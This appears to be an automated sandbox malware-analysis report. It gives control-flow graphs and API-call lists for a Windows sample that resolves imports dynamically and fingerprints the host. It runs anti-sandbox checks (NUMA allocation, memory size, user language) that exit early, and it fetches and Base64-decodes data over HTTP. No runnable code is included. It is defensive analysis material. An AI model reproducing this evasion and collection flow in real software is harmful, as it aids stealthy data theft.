25960->25962 25964 400ad4 25961->25964 25965 400acc lstrcpy 25961->25965 25963 400b87 25962->25963 25966 400b7f lstrcpy 25962->25966 27051 3e60d0 80 API 
calls 25963->27051 27048 3e60d0 80 API calls 25964->27048 25965->25964 25966->25963 25969 400b8d 27052 3fc840 70 API calls 25969->27052 25970 400ada 27049 3f85b0 47 API calls 25970->27049 25973 400b38 25976 400bd1 25973->25976 25979 3e1530 8 API calls 25973->25979 25974 400ae5 25975 3e1530 8 API calls 25974->25975 25978 400af6 25975->25978 25977 400bfa 25976->25977 25980 3e1530 8 API calls 25976->25980 25981 400c23 25977->25981 25987 3e1530 8 API calls 25977->25987 27050 3fd0f0 118 API calls 25978->27050 25983 400bb9 25979->25983 25986 400bf5 25980->25986 25985 400c4c 25981->25985 25989 3e1530 8 API calls 25981->25989 27053 3fd7b0 104 API calls 25983->27053 25990 400c75 25985->25990 25996 3e1530 8 API calls 25985->25996 27055 3fdfa0 149 API calls 25986->27055 25992 400c1e 25987->25992 25988 400bbe 25994 3e1530 8 API calls 25988->25994 25995 400c47 25989->25995 25997 400c9e 25990->25997 25998 3e1530 8 API calls 25990->25998 27056 3fe500 108 API calls 25992->27056 25999 400bcc 25994->25999 27057 3fe720 120 API calls 25995->27057 26002 400c70 25996->26002 26000 400cc7 25997->26000 26005 3e1530 8 API calls 25997->26005 26003 400c99 25998->26003 27054 3fecb0 98 API calls 25999->27054 26006 400cf0 26000->26006 26012 3e1530 8 API calls 26000->26012 27058 3fe9e0 110 API calls 26002->27058 27059 3e7bc0 152 API calls 26003->27059 26011 400cc2 26005->26011 26008 400d04 26006->26008 26009 400dca 26006->26009 26013 3e1530 8 API calls 26008->26013 26014 3e1530 8 API calls 26009->26014 27060 3feb70 108 API calls 26011->27060 26016 400ceb 26012->26016 26018 400d2a 26013->26018 26020 400de3 26014->26020 27061 4041e0 91 API calls 26016->27061 26021 400d56 lstrcpy 26018->26021 26022 400d5e 26018->26022 26019 400e11 27065 3e60d0 80 API calls 26019->27065 26020->26019 26023 400e09 lstrcpy 26020->26023 26021->26022 27062 3e60d0 80 API calls 26022->27062 26023->26019 26026 400e17 27066 3fc840 70 API calls 26026->27066 26027 400d64 27063 3f85b0 47 API calls 26027->27063 26030 400dc2 26032 
3e1530 8 API calls 26030->26032 26031 400d6f 26033 3e1530 8 API calls 26031->26033 26037 400e39 26032->26037 26034 400d80 26033->26034 27064 3fd0f0 118 API calls 26034->27064 26036 400e67 27067 3e60d0 80 API calls 26036->27067 26037->26036 26038 400e5f lstrcpy 26037->26038 26038->26036 26040 400e74 26042 400e95 26040->26042 27068 401660 12 API calls 26040->27068 26042->25720 26043->25691 26045 3e4a76 RtlAllocateHeap 26044->26045 26048 3e4ab4 VirtualProtect 26045->26048 26048->25723 26050 40182e 26049->26050 26051 401855 lstrlen 26050->26051 26052 401849 lstrcpy 26050->26052 26053 401873 26051->26053 26052->26051 26054 401885 lstrcpy lstrcat 26053->26054 26055 401898 26053->26055 26054->26055 26056 4018c7 26055->26056 26057 4018bf lstrcpy 26055->26057 26058 4018ce lstrlen 26056->26058 26057->26056 26059 4018e6 26058->26059 26060 4018f2 lstrcpy lstrcat 26059->26060 26061 401906 26059->26061 26060->26061 26062 401935 26061->26062 26063 40192d lstrcpy 26061->26063 26064 40193c lstrlen 26062->26064 26063->26062 26065 401958 26064->26065 26066 40196a lstrcpy lstrcat 26065->26066 26067 40197d 26065->26067 26066->26067 26068 4019ac 26067->26068 26069 4019a4 lstrcpy 26067->26069 26070 4019b3 lstrlen 26068->26070 26069->26068 26071 4019cb 26070->26071 26072 4019d7 lstrcpy lstrcat 26071->26072 26073 4019eb 26071->26073 26072->26073 26074 401a1a 26073->26074 26075 401a12 lstrcpy 26073->26075 26076 401a21 lstrlen 26074->26076 26075->26074 26077 401a3d 26076->26077 26078 401a4f lstrcpy lstrcat 26077->26078 26079 401a62 26077->26079 26078->26079 26080 401a89 lstrcpy 26079->26080 26081 401a91 26079->26081 26080->26081 26082 401a98 lstrlen 26081->26082 26083 401ab4 26082->26083 26084 401ac6 lstrcpy lstrcat 26083->26084 26085 401ad9 26083->26085 26084->26085 26086 401b08 26085->26086 26087 401b00 lstrcpy 26085->26087 26086->25839 26087->26086 26089 3e2a24 SystemTimeToFileTime SystemTimeToFileTime 26088->26089 26089->25842 26089->25844 26091 40157f 26090->26091 26092 40159f lstrcpy 
26091->26092 26093 4015a7 26091->26093 26092->26093 26094 4015d7 lstrcpy 26093->26094 26095 4015df 26093->26095 26094->26095 26096 40160f lstrcpy 26095->26096 26097 401617 26095->26097 26096->26097 26098 400155 lstrlen 26097->26098 26099 401647 lstrcpy 26097->26099 26098->25860 26099->26098 26101 3e4a60 2 API calls 26100->26101 26102 3e2e82 26101->26102 26103 3e4a60 2 API calls 26102->26103 26104 3e2ea0 26103->26104 26105 3e4a60 2 API calls 26104->26105 26106 3e2eb6 26105->26106 26107 3e4a60 2 API calls 26106->26107 26108 3e2ecb 26107->26108 26109 3e4a60 2 API calls 26108->26109 26110 3e2eec 26109->26110 26111 3e4a60 2 API calls 26110->26111 26112 3e2f01 26111->26112 26113 3e4a60 2 API calls 26112->26113 26114 3e2f19 26113->26114 26115 3e4a60 2 API calls 26114->26115 26116 3e2f3a 26115->26116 26117 3e4a60 2 API calls 26116->26117 26118 3e2f4f 26117->26118 26119 3e4a60 2 API calls 26118->26119 26120 3e2f65 26119->26120 26121 3e4a60 2 API calls 26120->26121 26122 3e2f7b 26121->26122 26123 3e4a60 2 API calls 26122->26123 26124 3e2f91 26123->26124 26125 3e4a60 2 API calls 26124->26125 26126 3e2faa 26125->26126 26127 3e4a60 2 API calls 26126->26127 26128 3e2fc0 26127->26128 26129 3e4a60 2 API calls 26128->26129 26130 3e2fd6 26129->26130 26131 3e4a60 2 API calls 26130->26131 26132 3e2fec 26131->26132 26133 3e4a60 2 API calls 26132->26133 26134 3e3002 26133->26134 26135 3e4a60 2 API calls 26134->26135 26136 3e3018 26135->26136 26137 3e4a60 2 API calls 26136->26137 26138 3e3031 26137->26138 26139 3e4a60 2 API calls 26138->26139 26140 3e3047 26139->26140 26141 3e4a60 2 API calls 26140->26141 26142 3e305d 26141->26142 26143 3e4a60 2 API calls 26142->26143 26144 3e3073 26143->26144 26145 3e4a60 2 API calls 26144->26145 26146 3e3089 26145->26146 26147 3e4a60 2 API calls 26146->26147 26148 3e309f 26147->26148 26149 3e4a60 2 API calls 26148->26149 26150 3e30b8 26149->26150 26151 3e4a60 2 API calls 26150->26151 26152 3e30ce 26151->26152 26153 3e4a60 2 API calls 26152->26153 26154 
3e30e4 26153->26154 26155 3e4a60 2 API calls 26154->26155 26156 3e30fa 26155->26156 26157 3e4a60 2 API calls 26156->26157 26158 3e3110 26157->26158 26159 3e4a60 2 API calls 26158->26159 26160 3e3126 26159->26160 26161 3e4a60 2 API calls 26160->26161 26162 3e313f 26161->26162 26163 3e4a60 2 API calls 26162->26163 26164 3e3155 26163->26164 26165 3e4a60 2 API calls 26164->26165 26166 3e316b 26165->26166 26167 3e4a60 2 API calls 26166->26167 26168 3e3181 26167->26168 26169 3e4a60 2 API calls 26168->26169 26170 3e3197 26169->26170 26171 3e4a60 2 API calls 26170->26171 26172 3e31ad 26171->26172 26173 3e4a60 2 API calls 26172->26173 26174 3e31c6 26173->26174 26175 3e4a60 2 API calls 26174->26175 26176 3e31dc 26175->26176 26177 3e4a60 2 API calls 26176->26177 26178 3e31f2 26177->26178 26179 3e4a60 2 API calls 26178->26179 26180 3e3208 26179->26180 26181 3e4a60 2 API calls 26180->26181 26182 3e321e 26181->26182 26183 3e4a60 2 API calls 26182->26183 26184 3e3234 26183->26184 26185 3e4a60 2 API calls 26184->26185 26186 3e324d 26185->26186 26187 3e4a60 2 API calls 26186->26187 26188 3e3263 26187->26188 26189 3e4a60 2 API calls 26188->26189 26190 3e3279 26189->26190 26191 3e4a60 2 API calls 26190->26191 26192 3e328f 26191->26192 26193 3e4a60 2 API calls 26192->26193 26194 3e32a5 26193->26194 26195 3e4a60 2 API calls 26194->26195 26196 3e32bb 26195->26196 26197 3e4a60 2 API calls 26196->26197 26198 3e32d4 26197->26198 26199 3e4a60 2 API calls 26198->26199 26200 3e32ea 26199->26200 26201 3e4a60 2 API calls 26200->26201 26202 3e3300 26201->26202 26203 3e4a60 2 API calls 26202->26203 26204 3e3316 26203->26204 26205 3e4a60 2 API calls 26204->26205 26206 3e332c 26205->26206 26207 3e4a60 2 API calls 26206->26207 26208 3e3342 26207->26208 26209 3e4a60 2 API calls 26208->26209 26210 3e335b 26209->26210 26211 3e4a60 2 API calls 26210->26211 26212 3e3371 26211->26212 26213 3e4a60 2 API calls 26212->26213 26214 3e3387 26213->26214 26215 3e4a60 2 API calls 26214->26215 26216 3e339d 
26215->26216 26217 3e4a60 2 API calls 26216->26217 26218 3e33b3 26217->26218 26219 3e4a60 2 API calls 26218->26219 26220 3e33c9 26219->26220 26221 3e4a60 2 API calls 26220->26221 26222 3e33e2 26221->26222 26223 3e4a60 2 API calls 26222->26223 26224 3e33f8 26223->26224 26225 3e4a60 2 API calls 26224->26225 26226 3e340e 26225->26226 26227 3e4a60 2 API calls 26226->26227 26228 3e3424 26227->26228 26229 3e4a60 2 API calls 26228->26229 26230 3e343a 26229->26230 26231 3e4a60 2 API calls 26230->26231 26232 3e3450 26231->26232 26233 3e4a60 2 API calls 26232->26233 26234 3e3469 26233->26234 26235 3e4a60 2 API calls 26234->26235 26236 3e347f 26235->26236 26237 3e4a60 2 API calls 26236->26237 26238 3e3495 26237->26238 26239 3e4a60 2 API calls 26238->26239 26240 3e34ab 26239->26240 26241 3e4a60 2 API calls 26240->26241 26242 3e34c1 26241->26242 26243 3e4a60 2 API calls 26242->26243 26244 3e34d7 26243->26244 26245 3e4a60 2 API calls 26244->26245 26246 3e34f0 26245->26246 26247 3e4a60 2 API calls 26246->26247 26248 3e3506 26247->26248 26249 3e4a60 2 API calls 26248->26249 26250 3e351c 26249->26250 26251 3e4a60 2 API calls 26250->26251 26252 3e3532 26251->26252 26253 3e4a60 2 API calls 26252->26253 26254 3e3548 26253->26254 26255 3e4a60 2 API calls 26254->26255 26256 3e355e 26255->26256 26257 3e4a60 2 API calls 26256->26257 26258 3e3577 26257->26258 26259 3e4a60 2 API calls 26258->26259 26260 3e358d 26259->26260 26261 3e4a60 2 API calls 26260->26261 26262 3e35a3 26261->26262 26263 3e4a60 2 API calls 26262->26263 26264 3e35b9 26263->26264 26265 3e4a60 2 API calls 26264->26265 26266 3e35cf 26265->26266 26267 3e4a60 2 API calls 26266->26267 26268 3e35e5 26267->26268 26269 3e4a60 2 API calls 26268->26269 26270 3e35fe 26269->26270 26271 3e4a60 2 API calls 26270->26271 26272 3e3614 26271->26272 26273 3e4a60 2 API calls 26272->26273 26274 3e362a 26273->26274 26275 3e4a60 2 API calls 26274->26275 26276 3e3640 26275->26276 26277 3e4a60 2 API calls 26276->26277 26278 3e3656 26277->26278 
control_flow_graph (continued; text serialisation of the rendered graph, node numbers and edge list omitted). Call chains recoverable from it, by function address:
• 3e366c–3e4a4a: a long unrolled sequence of calls into 3e4a60 (2 API calls each), ending in a call to 4066e0
• 4066e0–407177: staged import resolution; runs of GetProcAddress calls (5, 5, 5, 2, 2, 4, 1 and 4 in a row) interleaved with blocks of 43, 8, 8, 6, 12 and 10 further API calls, then 40051f and a call into 3e1530
• 3e1530 / 3e1610: conditional lstrcpy chains (string buffer set-up; 3e1555, 3e1577, 3e1599, 3e15fd and 3e162b, 3e164d, 3e166f, 3e1691)
• 3ff1b0–3ffe13: lstrlen (3ff1b0, 3ff1f7, 3ff21b) and lstrcpy copies feeding a hub at 3ff300 with further lstrcpy calls, StrCmpCA comparisons (3ff616, 3ff70f, 3ff99e, 3ffa29, 3ffcb8, 3ffd4d), a Sleep at 3ffd60, and calls into 3fee90 (28 API calls), 3fefb0 (35 API calls), 3e1530 (8 API calls) and 3e1610 (4 API calls)
• 402785–402860: GetVolumeInformationA at 40278c, GetProcessHeap and RtlAllocateHeap at 4027ec, wsprintfA at 402826, then 4071e0 (lstrcpy)
• 3e4c70–3e55d8: the HTTP request routine; lstrcpy set-up, 3e4bc0 (three ??2@YAPAXI allocations, lstrlen, InternetCrackUrlA), InternetOpenA and StrCmpCA at 3e4dac, 403e70 (lstrcpy, GetSystemTime), repeated lstrlen / lstrcpy / lstrcat buffer building, InternetConnectA at 3e5121, HttpOpenRequestA at 3e5150, header assembly through 407310 (lstrlen, lstrcpy, lstrcat), 407280 (lstrcpy) and 4072c0 (lstrcpy, lstrcat), then lstrlen, lstrlen, HttpSendRequestA and InternetReadFile at 3e53b1, a read loop (lstrlen at 3e53fd, lstrcpy / lstrcat at 3e542e and 3e546b, InternetReadFile at 3e547a), InternetCloseHandle at 3e549c, 3e54b1 and 3e54b8, CryptStringToBinaryA at 3e54b8, LocalAlloc at 3e54e8, a second CryptStringToBinaryA at 3e54ff, then LocalFree at 3e5517 or lstrlen / lstrcpy / lstrcat over the decoded buffer up to 3e55d8
• 3f8cc6–3f8ee2: ExitProcess at 3f8cc6; otherwise lstrlen calls (3f8d06, 3f8d30, 3f8d5a, 3f8e88), a chain of StrCmpCA comparisons (3f8d84, 3f8da4, 3f8dbd, 3f8ddd, 3f8dfd, 3f8e1d, 3f8e3d, 3f8e56, 3f8e6f) and an lstrcpy at 3f8ebb
• Nodes not connected to the chains above: 4031f0 (GetSystemInfo, wsprintfA); 404480 (OpenProcess, GetModuleFileNameExA, CloseHandle, lstrcpy); 402c10 (GetProcessHeap, RtlAllocateHeap, GetTimeZoneInformation, wsprintfA); 409711 (10 API calls, __setmbcp); 40749e (memset, ctype); 4030a0 (GetSystemPowerStatus); 4029a0 (GetCurrentProcess, IsWow64Process); 403130 (GetProcessHeap, RtlAllocateHeap, RegOpenKeyExA, RegQueryValueExA, RegCloseKey); and nodes listed only with an API count: 3f8c88 (16), 3eb309 (98), 402880 (10), 403480 (6), 403280 (7), 3fe0f9 (140), 3f6b79 (138), 3ff2f8 (93), 3e1b64 (162), 3ebbf9 (90), 3f4c77 (296), 3f1269 (408), 3e5869 (57), 404e35 (6), 3f3959 (244), 3f01d9 (126), 3f8615 (48 and 49), 3fe049 (147)
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E4C7F
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E4CD2
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E4D05
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E4D35
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E4D73
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E4DA6
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003E4DB6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$InternetOpen
                                  • String ID: "$------
                                  • API String ID: 2041821634-2370822465
                                  • Opcode ID: cb46ea9d38ebf41c0f7a6640a6484bd9b1e0d7d1611286f1a1795806da10b4a8
                                  • Instruction ID: d7993e93e5c38e62b573f39d96d4504714cfadcfa6ea190865f92f55645ddcd0
                                  • Opcode Fuzzy Hash: cb46ea9d38ebf41c0f7a6640a6484bd9b1e0d7d1611286f1a1795806da10b4a8
                                  • Instruction Fuzzy Hash: 5952A3319012669BCB22EFB5CC45B9F77B9AF44310F195229F805AB2D1DB74ED428BA0

                                  Control-flow Graph (text serialisation of the rendered graph; executed / not-executed colouring and edge list omitted). Basic blocks recoverable from it:
                                  • 406390–4063bd: GetPEB
                                  • 4063c3–4065be: call 4062f0, then GetProcAddress × 20 (taken or skipped before the LoadLibraryA block)
                                  • 4065c3–406623: LoadLibraryA × 5
                                  • 406625–406633: GetProcAddress (conditional)
                                  • 406641–406667: GetProcAddress × 2 (conditional)
                                  • 406675–406683: GetProcAddress (conditional)
                                  • 406691–40669f: GetProcAddress (conditional)
                                  • 4066ad–4066d2: GetProcAddress × 2 (conditional)
                                  • 4066d7–4066da: exit block
                                  APIs
                                  • GetProcAddress.KERNEL32(76210000,011A17C0), ref: 004063E9
                                  • GetProcAddress.KERNEL32(76210000,011A1778), ref: 00406402
                                  • GetProcAddress.KERNEL32(76210000,011A16A0), ref: 0040641A
                                  • GetProcAddress.KERNEL32(76210000,011A16B8), ref: 00406432
                                  • GetProcAddress.KERNEL32(76210000,011A8B78), ref: 0040644B
                                  • GetProcAddress.KERNEL32(76210000,01196698), ref: 00406463
                                  • GetProcAddress.KERNEL32(76210000,01196658), ref: 0040647B
                                  • GetProcAddress.KERNEL32(76210000,011A1718), ref: 00406494
                                  • GetProcAddress.KERNEL32(76210000,011A16D0), ref: 004064AC
                                  • GetProcAddress.KERNEL32(76210000,011A17F0), ref: 004064C4
                                  • GetProcAddress.KERNEL32(76210000,011A1700), ref: 004064DD
                                  • GetProcAddress.KERNEL32(76210000,01196718), ref: 004064F5
                                  • GetProcAddress.KERNEL32(76210000,011A1748), ref: 0040650D
                                  • GetProcAddress.KERNEL32(76210000,011A15C8), ref: 00406526
                                  • GetProcAddress.KERNEL32(76210000,01196838), ref: 0040653E
                                  • GetProcAddress.KERNEL32(76210000,011A1508), ref: 00406556
                                  • GetProcAddress.KERNEL32(76210000,011A1760), ref: 0040656F
                                  • GetProcAddress.KERNEL32(76210000,01196638), ref: 00406587
                                  • GetProcAddress.KERNEL32(76210000,011A1880), ref: 0040659F
                                  • GetProcAddress.KERNEL32(76210000,011965F8), ref: 004065B8
                                  • LoadLibraryA.KERNEL32(011A1808,?,?,?,00401C03), ref: 004065C9
                                  • LoadLibraryA.KERNEL32(011A1850,?,?,?,00401C03), ref: 004065DB
                                  • LoadLibraryA.KERNEL32(011A1820,?,?,?,00401C03), ref: 004065ED
                                  • LoadLibraryA.KERNEL32(011A18B0,?,?,?,00401C03), ref: 004065FE
                                  • LoadLibraryA.KERNEL32(011A1898,?,?,?,00401C03), ref: 00406610
                                  • GetProcAddress.KERNEL32(75B30000,011A18C8), ref: 0040662D
                                  • GetProcAddress.KERNEL32(751E0000,011A1868), ref: 00406649
                                  • GetProcAddress.KERNEL32(751E0000,011A1838), ref: 00406661
                                  • GetProcAddress.KERNEL32(76910000,011A8FD0), ref: 0040667D
                                  • GetProcAddress.KERNEL32(75670000,011966B8), ref: 00406699
                                  • GetProcAddress.KERNEL32(77310000,011A8BE8), ref: 004066B5
                                  • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 004066CC
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 004066C1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: d952e0c4e3c4fe0a350cb1b4c7bc2cb30e023315a21564864e78a2ebe5e47361
                                  • Instruction ID: 9e4233738dc68bddce53ef0e633477aed7236e645a54679618e30dae8974a13a
                                  • Opcode Fuzzy Hash: d952e0c4e3c4fe0a350cb1b4c7bc2cb30e023315a21564864e78a2ebe5e47361
                                  • Instruction Fuzzy Hash: FAA13DB5A112009FD754DF65ECA8AA637BBB78D746308E52FE916C3360DA34A801DB70

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph (basic blocks by node id; "-> N" lists successor blocks)
                                  • 2141: 401bf0-401c0b call 3e2a90 call 406390 -> 2146, 2147
                                  • 2146: 401c1a-401c27 call 3e2930 -> 2151, 2152
                                  • 2147: 401c0d -> 2148
                                  • 2148: 401c10-401c18 -> 2146, 2148 (loop)
                                  • 2151: 401c35-401c63 -> 2156, 2157
                                  • 2152: 401c29-401c2f lstrcpy -> 2151
                                  • 2156: 401c65-401c67 ExitProcess
                                  • 2157: 401c6d-401c7b GetSystemInfo -> 2158, 2159
                                  • 2158: 401c85-401ca0 call 3e1030 call 3e10c0 GetUserDefaultLangID -> 2164, 2165
                                  • 2159: 401c7d-401c7f ExitProcess
                                  • 2164: 401ca2-401ca9 -> 2165, 2166
                                  • 2165: 401cb8-401cca call 402ad0 call 403e10 -> 2171, 2172
                                  • 2166: 401cb0-401cb2 ExitProcess
                                  • 2171: 401ce7-401d06 lstrlen call 3e2930 -> 2178, 2179
                                  • 2172: 401ccc-401cde call 402a40 call 403e10 -> 2171, 2185
                                  • 2178: 401d23-401d40 lstrlen call 3e2930 -> 2186, 2187
                                  • 2179: 401d08-401d0d -> 2178, 2180
                                  • 2180: 401d0f-401d11 -> 2178, 2183
                                  • 2183: 401d13-401d1d lstrcpy lstrcat -> 2178
                                  • 2185: 401ce0-401ce1 ExitProcess
                                  • 2186: 401d42-401d44 -> 2187, 2188
                                  • 2187: 401d5a-401d7b call 402ad0 lstrlen call 3e2930 -> 2193, 2194
                                  • 2188: 401d46-401d54 lstrcpy lstrcat -> 2187
                                  • 2193: 401d9a-401db4 lstrlen call 3e2930 -> 2199, 2200
                                  • 2194: 401d7d-401d7f -> 2193, 2196
                                  • 2196: 401d81-401d85 -> 2193, 2198
                                  • 2198: 401d87-401d94 lstrcpy lstrcat -> 2193
                                  • 2199: 401db6-401db8 -> 2200, 2201
                                  • 2200: 401dce-401deb call 402a40 lstrlen call 3e2930 -> 2206, 2207
                                  • 2201: 401dba-401dc8 lstrcpy lstrcat -> 2200
                                  • 2206: 401e0a-401e0f -> 2209, 2210
                                  • 2207: 401ded-401def -> 2206, 2208
                                  • 2208: 401df1-401df5 -> 2206, 2212
                                  • 2209: 401e11 call 3e2a20 -> 2210
                                  • 2210: 401e16-401e22 call 3e2930 -> 2215, 2216
                                  • 2212: 401df7-401e04 lstrcpy lstrcat -> 2206
                                  • 2215: 401e30-401e66 call 3e2a20 * 5 OpenEventA -> 2228, 2229
                                  • 2216: 401e24-401e26 -> 2215, 2217
                                  • 2217: 401e28-401e2a lstrcpy -> 2215
                                  • 2228: 401e68-401e8a CloseHandle Sleep OpenEventA -> 2228 (loop), 2229
                                  • 2229: 401e8c-401ea0 CreateEventA call 401b20 call 3fffd0 -> 2233
                                  • 2233: 401ea5-401eae CloseHandle ExitProcess
                                  APIs
                                    • Part of subcall function 00406390: GetProcAddress.KERNEL32(76210000,011A17C0), ref: 004063E9
                                    • Part of subcall function 00406390: GetProcAddress.KERNEL32(76210000,011A1778), ref: 00406402
                                    • Part of subcall function 00406390: GetProcAddress.KERNEL32(76210000,011A16A0), ref: 0040641A
                                    • Part of subcall function 00406390: GetProcAddress.KERNEL32(76210000,011A16B8), ref: 00406432
                                    • Part of subcall function 00406390: GetProcAddress.KERNEL32(76210000,011A8B78), ref: 0040644B
                                    • Part of subcall function 00406390: GetProcAddress.KERNEL32(76210000,01196698), ref: 00406463
                                    • Part of subcall function 00406390: GetProcAddress.KERNEL32(76210000,01196658), ref: 0040647B
                                    • Part of subcall function 00406390: GetProcAddress.KERNEL32(76210000,011A1718), ref: 00406494
                                    • Part of subcall function 00406390: GetProcAddress.KERNEL32(76210000,011A16D0), ref: 004064AC
                                    • Part of subcall function 00406390: GetProcAddress.KERNEL32(76210000,011A17F0), ref: 004064C4
                                    • Part of subcall function 00406390: GetProcAddress.KERNEL32(76210000,011A1700), ref: 004064DD
                                    • Part of subcall function 00406390: GetProcAddress.KERNEL32(76210000,01196718), ref: 004064F5
                                    • Part of subcall function 00406390: GetProcAddress.KERNEL32(76210000,011A1748), ref: 0040650D
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 00401C2F
                                  • ExitProcess.KERNEL32 ref: 00401C67
                                  • GetSystemInfo.KERNEL32(?), ref: 00401C71
                                  • ExitProcess.KERNEL32 ref: 00401C7F
                                    • Part of subcall function 003E1030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 003E1046
                                    • Part of subcall function 003E1030: VirtualAllocExNuma.KERNEL32(00000000), ref: 003E104D
                                    • Part of subcall function 003E1030: ExitProcess.KERNEL32 ref: 003E1058
                                    • Part of subcall function 003E10C0: GlobalMemoryStatusEx.KERNEL32 ref: 003E10EA
                                    • Part of subcall function 003E10C0: ExitProcess.KERNEL32 ref: 003E1114
                                  • GetUserDefaultLangID.KERNEL32 ref: 00401C8F
                                  • ExitProcess.KERNEL32 ref: 00401CB2
                                  • ExitProcess.KERNEL32 ref: 00401CE1
                                  • lstrlen.KERNEL32(011A8AD8), ref: 00401CEE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00401D15
                                  • lstrcat.KERNEL32(00000000,011A8AD8), ref: 00401D1D
                                  • lstrlen.KERNEL32(00414B98), ref: 00401D28
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00401D48
                                  • lstrcat.KERNEL32(00000000,00414B98), ref: 00401D54
                                  • lstrlen.KERNEL32(00000000), ref: 00401D63
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00401D89
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00401D94
                                  • lstrlen.KERNEL32(00414B98), ref: 00401D9F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00401DBC
                                  • lstrcat.KERNEL32(00000000,00414B98), ref: 00401DC8
                                  • lstrlen.KERNEL32(00000000), ref: 00401DD7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00401DF9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00401E04
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
